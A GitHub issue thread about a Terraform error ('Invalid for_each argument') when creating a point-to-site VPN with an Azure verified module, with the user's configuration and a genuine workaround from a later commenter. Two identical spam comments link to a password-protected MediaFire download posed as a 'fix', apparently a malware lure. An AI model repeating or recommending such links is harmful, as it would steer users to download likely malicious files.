### ISSUE TITLE
Error with public_ip

### ISSUE THREAD

**Issue by gevraud** [Azure/terraform-azurerm-avm-ptn-vnetgateway#78]
### Check for previous/existing GitHub issues

- [X] I have checked for previous/existing GitHub issues

### Issue Type?

Bug

### Description

Hello,

I am trying to create a new P2S VPN using this module. 

This is a greenfield install, no resource exists yet.

It seems that there is a chicken and egg problem

```
Plan: 5 to add, 0 to change, 0 to destroy.
│ Error: Invalid for_each argument
│
│   on .terraform/modules/vnetgateway/main.tf line 33, in resource "azurerm_public_ip" "vgw":
│   33:   for_each = local.azurerm_public_ip
│     ├────────────────
│     │ local.azurerm_public_ip will be known only after apply
│
│ The "for_each" map includes keys derived from resource attributes that cannot be determined until apply, and so Terraform cannot determine
│ the full set of keys that will identify the instances of this resource.
│
│ When working with unknown values in for_each, it's better to define the map keys statically in your configuration and place apply-time
│ results only in the map values.
│
│ Alternatively, you could use the -target planning option to first apply only the resources that the for_each value depends on, and then apply
│ a second time to fully converge.
```

Code : 

```
module "vnetgateway" {
  source  = "Azure/avm-ptn-vnetgateway/azurerm"
  version = "0.5.1"

  enable_telemetry          = false
  location                  = var.location
  name                      = var.vgw_name
  subnet_address_prefix     = var.subnet_address_prefix 
  sku                       = "VpnGw2AZ"
  type                      = "Vpn"
  virtual_network_id        = module.vnet.resource_id
  subnet_creation_enabled   = false
  vpn_active_active_enabled = false
  vpn_bgp_enabled           = false
  vpn_type                  = "RouteBased"
  ip_configurations = {
    "ip_config" = {
      name            = "vnetGatewayConfig01"
      public_ip = {
        id = module.pip.public_ip_id
      }
      private_ip_address_allocation = "Dynamic"
      subnet_id = module.vnet.subnets.gateway_subnet.resource_id
    }
  }
  vpn_point_to_site = {
    address_space = var.p2s_address_space  
    aad_tenant    = "https://login.microsoftonline.com/${data.azurerm_client_config.current.tenant_id}"
    aad_audience  = "41b23e61-6c1e-4545-b367-cd054e0ed4b4"  // id provided by Azure
    aad_issuer    = "https://sts.windows.net/${data.azurerm_client_config.current.tenant_id}"
    vpn_client_protocols = var.vpn_client_protocols
    vpn_auth_types       = var.vpn_auth_types
  }

  tags       = var.tags
  depends_on = [module.vnet, module.pip, azurerm_resource_group.this]
}

module "pip" {
  source  = "Azure/avm-res-network-publicipaddress/azurerm"
  version = "0.1.2"

  enable_telemetry    = false
  name                = var.pip_name
  location            = azurerm_resource_group.this.location
  resource_group_name = azurerm_resource_group.this.name
  allocation_method   = "Static"
  sku                 = "Standard"
  zones               = ["1", "2", "3"]
  ip_version          = "IPv4"
  tags                = var.tags
  depends_on          = [azurerm_resource_group.this]
}
```

Any idea ? Did I miss something ?

Regards

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by luke-taylor** [comment]
@gevraud You could get around this by listing out the id as a string with its component parts, this way Terraform will know that it isn't null at plan-time. 

However I think a better solution would be a `creation_enabled` flag, that way we know how many public_ips we need to create at plan-time in a concrete way.
